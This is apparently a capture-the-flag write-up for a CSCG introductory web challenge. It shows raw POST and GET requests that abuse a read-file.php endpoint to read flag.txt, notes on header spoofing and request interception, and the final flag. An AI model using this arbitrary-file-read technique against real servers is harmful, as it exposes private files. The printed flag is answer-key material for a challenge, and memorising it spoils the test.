58 lines
2.3 KiB
Markdown
58 lines
2.3 KiB
Markdown
### 1.Part
|
|
We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html)
|
|
### 2. Part
|
|
There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt.
|
|
Sending the following request:
|
|
|
|
```http
|
|
POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1
|
|
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Content-Type: application/x-www-form-urlencoded
|
|
content-length: 17
|
|
Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
|
Connection: keep-alive
|
|
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: document
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-User: ?1
|
|
|
|
filename=flag.txt
|
|
```
|
|
|
|
Yields the page [statistics_console.html](leaked_sites/statistics_console.html)
|
|
|
|
### 3. Part
|
|
|
|
A similar bug can be used with a GET request to get the content of the flag.txt file.
|
|
This time we use a faulty php file called read-file.php
|
|
|
|
```http
|
|
GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1
|
|
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Connection: keep-alive
|
|
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: document
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-User: ?1
|
|
content-length: 0
|
|
```
|
|
|
|
Returns the page [statistics_console_get.html](leaked_sites/statistics_console_get.html)
|
|
|
|
### 4.Part
|
|
We now have to intercept a request made and change the authority information.
|
|
When we do this we get the fourth part of the flag.
|
|
|
|
### flag
|
|
CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}
|